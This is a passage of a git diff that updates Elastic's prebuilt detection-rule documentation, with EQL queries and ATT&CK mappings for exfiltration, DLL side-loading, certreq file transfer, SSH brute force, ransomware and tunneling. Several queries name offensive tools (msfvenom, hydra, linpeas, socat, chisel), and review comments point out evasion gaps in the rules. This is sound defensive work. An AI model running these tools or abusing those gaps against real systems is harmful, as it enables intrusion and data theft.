ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc new file mode 100644 index 0000000000..891bb3006f --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc 
@@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-iso-code]] +=== Potential Data Exfiltration Activity to an Unusual ISO Code + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc new file mode 100644 index 0000000000..aac0aa8fff --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc 
@@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-region]] +=== Potential Data Exfiltration Activity to an Unusual Region + +A machine learning job has detected data exfiltration to a particular geo-location (by region name). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc index 383e7243eb..284fef1322 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-defense-evasion-via-proot.asciidoc 
@@ -31,7 +31,7 @@ Identifies the execution of the PRoot utility, an open-source tool for user-spac * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc new file mode 100644 index 0000000000..98e37507fe --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc @@ -0,0 +1,58 @@ +[[potential-dga-activity]] +=== Potential DGA Activity + +A population analysis machine learning job detected potential DGA (domain generation algorithm) activity. Such activity is often used by malware command and control (C2) channels. This machine learning job looks for a source IP address making DNS requests that have an aggregate high probability of being DGA activity. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-45m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/dga + +*Tags*: + +* Use Case: Domain Generation Algorithm Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Command and Control + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Dynamic Resolution +** ID: T1568 +** Reference URL: https://attack.mitre.org/techniques/T1568/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc index 2976c17e9e..9cd02928be 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-apparmor.asciidoc @@ -29,7 +29,7 @@ This rule monitors for potential attempts to disable AppArmor. AppArmor is a Lin * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc index dbc5c5afe2..2125a77db0 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-disabling-of-selinux.asciidoc @@ -32,7 +32,7 @@ Identifies potential attempts to disable Security-Enhanced Linux (SELinux), whic * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc new file mode 100644 index 0000000000..bd9f618a4b --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc 
@@ -0,0 +1,89 @@ +[[potential-dll-side-loading-via-trusted-microsoft-programs]] +=== Potential DLL Side-Loading via Trusted Microsoft Programs + +Identifies an instance of a Windows trusted program that is known to be vulnerable to DLL Search Order Hijacking starting after being renamed or from a non-standard path. This is uncommon behavior and may indicate an attempt to evade defenses via side loading a malicious DLL within the memory space of one of those processes. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: high + +*Risk score*: 73 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + process.pe.original_file_name in ("WinWord.exe", "EXPLORER.EXE", "w3wp.exe", "DISM.EXE") and + not (process.name : ("winword.exe", "explorer.exe", "w3wp.exe", "Dism.exe") or + process.executable : ("?:\\Windows\\explorer.exe", + "?:\\Program Files\\Microsoft Office\\root\\Office*\\WINWORD.EXE", + "?:\\Program Files?(x86)\\Microsoft Office\\root\\Office*\\WINWORD.EXE", + "?:\\Windows\\System32\\Dism.exe", + "?:\\Windows\\SysWOW64\\Dism.exe", + "?:\\Windows\\System32\\inetsrv\\w3wp.exe") + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: 
Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Masquerading +** ID: T1036 +** Reference URL: https://attack.mitre.org/techniques/T1036/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Sub-technique: +** Name: DLL Side-Loading +** ID: T1574.002 +** Reference URL: https://attack.mitre.org/techniques/T1574/002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc index 81c6d30ab3..a005151708 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-dns-tunneling-via-nslookup.asciidoc @@ -36,7 +36,7 @@ This rule identifies a large number (15) of nslookup.exe executions with an expl * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -109,3 +109,7 @@ event.category:process and host.os.type:windows and event.type:start and process ** Name: DNS ** ID: T1071.004 ** Reference URL: https://attack.mitre.org/techniques/T1071/004/ +* Technique: +** Name: Protocol Tunneling +** ID: T1572 +** Reference URL: https://attack.mitre.org/techniques/T1572/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc index aae8d73d26..43d3ea5a57 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-external-linux-ssh-brute-force-detected.asciidoc 
@@ -17,7 +17,7 @@ Identifies multiple external consecutive login failures targeting a user account *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -28,7 +28,7 @@ Identifies multiple external consecutive login failures targeting a user account * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -87,7 +87,7 @@ In case this rule generates too much noise and external brute forcing is of not [source, js] ---------------------------------- -sequence by host.id, source.ip, user.name with maxspan=5s +sequence by host.id, source.ip, user.name with maxspan=15s [ authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and not cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", diff --git a/docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc new file mode 100644 index 0000000000..6d6e639b68 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc 
@@ -0,0 +1,84 @@ +[[potential-file-transfer-via-certreq]] +=== Potential File Transfer via Certreq + +Identifies Certreq making an HTTP Post request. Adversaries could abuse Certreq to download files or upload data to a remote URL. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://lolbas-project.github.io/lolbas/Binaries/Certreq/ + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Command and Control +* Tactic: Exfiltration +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 5 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "CertReq.exe" or process.pe.original_file_name == "CertReq.exe") and process.args : "-Post" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Command and Control +** ID: TA0011 +** Reference URL: https://attack.mitre.org/tactics/TA0011/ +* Technique: +** Name: Ingress Tool Transfer +** ID: T1105 +** Reference URL: https://attack.mitre.org/techniques/T1105/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over Web Service +** ID: T1567 +** Reference URL: 
https://attack.mitre.org/techniques/T1567/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc index 420191d32a..90bd22d193 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-hidden-process-via-mount-hidepid.asciidoc @@ -31,7 +31,7 @@ Identifies the execution of mount process with hidepid parameter, which can make * Tactic: Defense Evasion * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc index 1bd9361db4..61a249da85 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-internal-linux-ssh-brute-force-detected.asciidoc @@ -17,7 +17,7 @@ Identifies multiple internal consecutive login failures targeting a user account *Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) -*Maximum alerts per execution*: 100 +*Maximum alerts per execution*: 5 *References*: None @@ -28,7 +28,7 @@ Identifies multiple internal consecutive login failures targeting a user account * Use Case: Threat Detection * Tactic: Credential Access -*Version*: 7 +*Version*: 8 *Rule authors*: 
@@ -83,7 +83,7 @@ The rule identifies consecutive internal SSH login failures targeting a user acc [source, js] ---------------------------------- -sequence by host.id, source.ip, user.name with maxspan=5s +sequence by host.id, source.ip, user.name with maxspan=15s [ authentication where host.os.type == "linux" and event.action in ("ssh_login", "user_login") and event.outcome == "failure" and cidrmatch(source.ip, "10.0.0.0/8", "127.0.0.0/8", "169.254.0.0/16", "172.16.0.0/12", "192.0.0.0/24", diff --git a/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc index 58be9bdc9f..b3f213986f 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-lateral-tool-transfer-via-smb-share.asciidoc @@ -8,8 +8,6 @@ Identifies the creation or change of a Windows executable file over network shar *Rule indices*: * logs-endpoint.events.* -* winlogbeat-* -* logs-windows.* *Severity*: medium @@ -32,7 +30,7 @@ Identifies the creation or change of a Windows executable file over network shar * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -100,7 +98,8 @@ sequence by host.id with maxspan=30s network.transport == "tcp" and source.ip != "127.0.0.1" and source.ip != "::1" ] by process.entity_id /* add more executable extensions here if they are not noisy in your environment */ - [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and file.extension : ("exe", "dll", "bat", "cmd")] by process.entity_id + [file where host.os.type == "windows" and event.type in ("creation", "change") and process.pid == 4 and + (file.Ext.header_bytes : "4d5a*" or file.extension : ("exe", "scr", "pif", "com", "dll"))] by process.entity_id ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc index fb11b2fdf8..feee757804 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-backdoor-user-account-creation.asciidoc @@ -32,7 +32,7 @@ Identifies the attempt to create a new backdoor user by setting the user's UID t * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -93,6 +93,7 @@ This rule identifies the usage of the `usermod` command to set a user's UID to 0 - Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. - Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + ---------------------------------- ==== Rule query 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc index b5c6d9f6f5..1a3bf491f6 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-proc-filesystem.asciidoc @@ -33,7 +33,7 @@ Identifies the execution of the mimipenguin exploit script which is linux adapta * Use Case: Vulnerability * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc index fd5c481be7..fe2c102bd8 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-credential-dumping-via-unshadow.asciidoc @@ -33,7 +33,7 @@ Identifies the execution of the unshadow utility which is part of John the Rippe * Tactic: Credential Access * Data Source: Elastic Defend -*Version*: 4 +*Version*: 5 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc new file mode 100644 index 0000000000..4655d7ee0e --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc 
@@ -0,0 +1,73 @@ +[[potential-linux-hack-tool-launched]] +=== Potential Linux Hack Tool Launched + +Monitors for the execution of different processes that might be used by attackers for malicious intent. An alert from this rule should be investigated further, as hack tools are commonly used by blue teamers and system administrators as well. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* endgame-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "linux" and event.action in ("exec", "exec_event") and event.type == "start" and +process.name in ( + // exploitation frameworks + "crackmapexec", "msfconsole", "msfvenom", "sliver-client", "sliver-server", "havoc", + // network scanners (nmap left out to reduce noise) + "zenmap", "nuclei", "netdiscover", "legion", + // web enumeration + "gobuster", "dirbuster", "dirb", "wfuzz", "ffuf", "whatweb", "eyewitness", + // web vulnerability scanning + "wpscan", "joomscan", "droopescan", "nikto", + // exploitation tools + "sqlmap", "commix", "yersinia", + // cracking and brute forcing + "john", "hashcat", "hydra", "ncrack", "cewl", "fcrackzip", "rainbowcrack", + // host and network + "linenum.sh", "linpeas.sh", "pspy32", "pspy32s", "pspy64", "pspy64s", "binwalk", "evil-winrm" +) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: 
https://attack.mitre.org/tactics/TA0002/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc index f0ea302050..19d893a5c9 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-local-account-brute-force-detected.asciidoc @@ -29,7 +29,7 @@ Identifies multiple consecutive login attempts executed by one process targeting * Tactic: Credential Access * Data Source: Elastic Defend -*Version*: 2 +*Version*: 3 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc index 8613f8b3c5..260502b9f2 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-ransomware-note-creation-detected.asciidoc @@ -29,7 +29,7 @@ This rule identifies a sequence of a mass file encryption event in conjunction w * Tactic: Impact * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: 
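Review bot: the `*Framework*: MITRE ATT&CK` block at the end of the new potential-linux-hack-tool-launched.asciidoc hunk lists only the Execution tactic (`** ID: TA0002`) with no `* Technique:` entry beneath it, unlike every other rule page touched in this change; add the technique the rule is mapped to so the page is consistent. The query also keys on `process.name in (... "linenum.sh", "linpeas.sh", "pspy32", ...)`, which only fires when the script is executed directly; an invocation through an interpreter (`bash linpeas.sh`) reports the shell as `process.name`, so either document that gap next to the existing "commonly used by blue teamers" caveat or add a `process.args` clause for the script names.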
@@ -43,18 +43,12 @@ This rule identifies a sequence of a mass file encryption event in conjunction w [source, js] ---------------------------------- -sequence by host.id, process.entity_id with maxspan=1s +sequence by process.entity_id, host.id with maxspan=1s [file where host.os.type == "linux" and event.type == "change" and event.action == "rename" and file.extension : "?*" - and ((process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish", "ash", "openssl")) or - (process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*"))) and + and process.executable : ("./*", "/tmp/*", "/var/tmp/*", "/dev/shm/*", "/var/run/*", "/boot/*", "/srv/*", "/run/*") and file.path : ( "/home/*/Downloads/*", "/home/*/Documents/*", "/root/*", "/bin/*", "/usr/bin/*", - "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*") and not (( - process.name : ( - "dpkg", "yum", "dnf", "rpm", "dockerd", "go", "java", "pip*", "python*", "node", "containerd", "php", "p4d", - "conda", "chrome", "imap", "cmake", "firefox", "semanage", "semodule", "ansible-galaxy", "fc-cache", "jammy", "git", - "systemsettings", "vmis-launcher")) or (file.path : "/etc/selinux/*") or (file.extension in ("qmlc", "txt") - ))] with runs=25 + "/opt/*", "/etc/*", "/var/log/*", "/var/lib/log/*", "/var/backup/*", "/var/www/*")] with runs=25 [file where host.os.type == "linux" and event.action == "creation" and file.name : ( "*crypt*", "*restore*", "*lock*", "*recovery*", "*data*", "*read*", "*instruction*", "*how_to*", "*ransom*" )] diff --git a/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc index c86c782eb3..f2ae11ca42 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc 
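Review bot: the rewritten first sequence step in the `@@ -43,18 +43,12 @@` hunk drops the `process.name in ("bash", "dash", "sh", ... "openssl")` alternative and now requires `process.executable` to sit under `./*`, `/tmp/*`, `/dev/shm/*` or the other listed paths, so a mass rename driven by a shell or `openssl` launched from `/bin` or `/usr/bin` no longer matches; the commit message does not mention this narrowing and the unchanged context still describes the rule as identifying mass file encryption generally, so state the new precondition in the rule description. Removing the `not (process.name : ("dpkg", "yum", ...) or file.path : "/etc/selinux/*" or file.extension in ("qmlc", "txt"))` exclusion is consistent with that narrowing, since package managers run from standard paths, but `.txt` renames now count toward `runs=25`. Reordering the keys to `sequence by process.entity_id, host.id` has no effect on which events are joined.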
+++ b/docs/detections/prebuilt-rules/rule-details/potential-linux-tunneling-and-or-port-forwarding.asciidoc @@ -32,7 +32,7 @@ This rule monitors for a set of Linux utilities that can be used for tunneling a * Tactic: Command and Control * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: 
@@ -47,19 +47,21 @@ This rule monitors for a set of Linux utilities that can be used for tunneling a [source, js] ---------------------------------- process where host.os.type == "linux" and event.action == "exec" and event.type == "start" and (( -// gost & pivotnacci - spawned without process.parent.name -(process.name == "gost" and process.args : ("-L*", "-C*", "-R*")) or (process.name == "pivotnacci")) or ( -// ssh -(process.name in ("ssh", "sshd") and (process.args in ("-R", "-L", "D", "-w") and process.args_count >= 4)) or -// sshuttle -(process.name == "sshuttle" and process.args in ("-r", "--remote", "-l", "--listen") and process.args_count >= 4) or -// socat -(process.name == "socat" and process.args : ("TCP4-LISTEN:*", "SOCKS*") and process.args_count >= 3) or -// chisel -(process.name : "chisel*" and process.args in ("client", "server")) or -// iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok -(process.name in ("iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", "ssf", "3proxy", "ngrok")) -) and process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish")) + // gost & pivotnacci - spawned without process.parent.name + (process.name == "gost" and process.args : ("-L*", "-C*", "-R*")) or (process.name == "pivotnacci")) or ( + // ssh + (process.name in ("ssh", "sshd") and (process.args in ("-R", "-L", "D", "-w") and process.args_count >= 4 and + not process.args : "chmod")) or + // sshuttle + (process.name == "sshuttle" and process.args in ("-r", "--remote", "-l", "--listen") and process.args_count >= 4) or + // socat + (process.name == "socat" and process.args : ("TCP4-LISTEN:*", "SOCKS*") and process.args_count >= 3) or + // chisel + (process.name : "chisel*" and process.args in ("client", "server")) or + // iodine(d), dnscat, hans, ptunnel-ng, ssf, 3proxy & ngrok + (process.name in ("iodine", "iodined", "dnscat", "hans", "hans-ubuntu", "ptunnel-ng", "ssf", "3proxy", "ngrok")) + ) and process.parent.name 
in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") +) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc index 80d24aab6e..23b998dc0f 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-local-ntlm-relay-via-http.asciidoc @@ -34,10 +34,11 @@ Identifies attempt to coerce a local NTLM authentication via HTTP using the Wind * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -72,3 +73,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Exploitation for Credential Access ** ID: T1212 ** Reference URL: https://attack.mitre.org/techniques/T1212/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc index a0cc95bdfa..062b3d9bd0 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-masquerading-as-browser-process.asciidoc 
